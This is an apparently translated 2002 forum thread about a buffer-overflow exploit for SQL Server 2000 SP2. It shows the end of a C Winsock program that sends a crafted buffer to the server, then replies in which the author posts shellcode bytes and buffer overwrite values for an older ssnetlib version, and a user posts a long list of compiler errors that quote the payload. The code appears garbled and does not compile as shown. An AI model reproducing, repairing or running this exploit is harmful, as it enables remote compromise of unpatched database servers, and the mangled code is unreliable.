
Implementing the overflow attack on the SQL Server 2000 SP2 12 command.txt

Gives some understanding of hacker programming
    printf("Send failed.Error:%d\n",WSAGetLastError());
    return FALSE;
  }

  len=recv(sock,buf1,255,NULL);
  for(i=0;i<len;i++)
  {
    printf("%02x ",buf1[i]);
    if(i%16==15)
      printf("\n");
  }
  printf("\n");
  buf0[0]=0x10;
  if (send(sock, buf0, sizeof(buf0), 0)==SOCKET_ERROR)
  {
    printf("Send failed.Error:%d\n",WSAGetLastError());
    return FALSE;
  }
  WSACleanup();
  return 0;

}




 Oh! These ignorant things are all I have; if you want to regret it, come on!
闪空家园 (Flashsky Home)


--------------------------------------------------------------------------------


 Reply by: youzulin  Posted: 2002-09-14 11:10:07

Nice. I've reposted it to my forum: http://hhh4.yeah.net. Everyone is welcome to drop by when you have time.



--------------------------------------------------------------------------------


 Reply by: shensonkind  Posted: 2002-09-14 11:57:24

Compiling gives the following errors?:
 
E:\szj\sqlhack\aqlhack.cpp(19) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(19) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(20) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(20) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(22) : error C2117: '\x83\xc4\x81\x8b\xc4\x50\xff\x15\xf8\xe0\xcf\x42"\x33\xc0\x50\xff\x15\x84\xe0\xcf\x42"};' : array bounds overflow
E:\szj\sqlhack\aqlhack.cpp(22) : error C2062: type 'int' unexpected
E:\szj\sqlhack\aqlhack.cpp(32) : error C2065: 'i' : undeclared identifier
E:\szj\sqlhack\aqlhack.cpp(35) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(35) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(36) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(36) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(36) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(36) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(36) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(37) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(37) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(37) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(37) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(37) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(38) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(38) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(38) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(38) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(38) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(39) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(39) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(39) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(39) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(39) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(40) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(40) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(40) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(40) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(40) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(41) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(41) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(41) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(41) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(41) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(42) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(42) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(42) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(42) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(42) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(43) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(43) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(43) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(43) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(43) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(44) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(44) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(44) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(44) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(44) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(45) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(45) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(45) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(45) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(45) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(46) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(46) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(46) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(46) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(46) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(47) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(47) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(47) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(47) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(47) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(48) : warning C4305: '=' : truncation from 'const int' to 'unsigned char'
E:\szj\sqlhack\aqlhack.cpp(48) : warning C4309: '=' : truncation of constant value
E:\szj\sqlhack\aqlhack.cpp(48) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(48) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(48) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(48) : error C2015: too many characters in constant
E:\szj\sqlhack\aqlhack.cpp(51) : error C2146: syntax error : missing ';' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(116) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(116) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(117) : error C2143: syntax error : missing ')' before 'return'
E:\szj\sqlhack\aqlhack.cpp(121) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(121) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(122) : error C2143: syntax error : missing ')' before 'return'
E:\szj\sqlhack\aqlhack.cpp(131) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(131) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(132) : error C2143: syntax error : missing ')' before 'return'
E:\szj\sqlhack\aqlhack.cpp(134) : error C2664: 'send' : cannot convert parameter 2 from 'unsigned char [620]' to 'const char *'
    Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
E:\szj\sqlhack\aqlhack.cpp(136) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(136) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(137) : error C2143: syntax error : missing ')' before 'return'
E:\szj\sqlhack\aqlhack.cpp(140) : error C2664: 'recv' : cannot convert parameter 2 from 'unsigned char [255]' to 'char *'
    Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
E:\szj\sqlhack\aqlhack.cpp(143) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(143) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(144) : error C2143: syntax error : missing ')' before 'if'
E:\szj\sqlhack\aqlhack.cpp(145) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(145) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(146) : error C2143: syntax error : missing ')' before '}'
E:\szj\sqlhack\aqlhack.cpp(147) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(147) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(148) : error C2146: syntax error : missing ')' before identifier 'buf0'
E:\szj\sqlhack\aqlhack.cpp(149) : error C2664: 'send' : cannot convert parameter 2 from 'unsigned char [620]' to 'const char *'
    Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
E:\szj\sqlhack\aqlhack.cpp(151) : error C2017: illegal escape sequence
E:\szj\sqlhack\aqlhack.cpp(151) : error C2001: newline in constant
E:\szj\sqlhack\aqlhack.cpp(152) : error C2143: syntax error : missing ')' before 'return'
Error executing cl.exe.
sqlhack.exe - 77 error(s), 26 warning(s)




--------------------------------------------------------------------------------


 Reply by: flashsky  Posted: 2002-09-14 15:58:53


With the following changes it can be demonstrated on the old ssnetlib
//Demonstration SHELLCODE for the old version
char exploit_code<21>= "\x83\xc4\x81\x8b\xc4\x50\xff\x15\xc0\xf0\xcf\x42"
"\x33\xc0\x50\xff\x15\x8c\xf0\xcf\x42";
buf0=0xfc;
buf0=0x2c;
buf0=0xd0;
buf0=0x42;
buf0=0xfc;
buf0=0x2c;
buf0=0xce;
buf0=0x42;


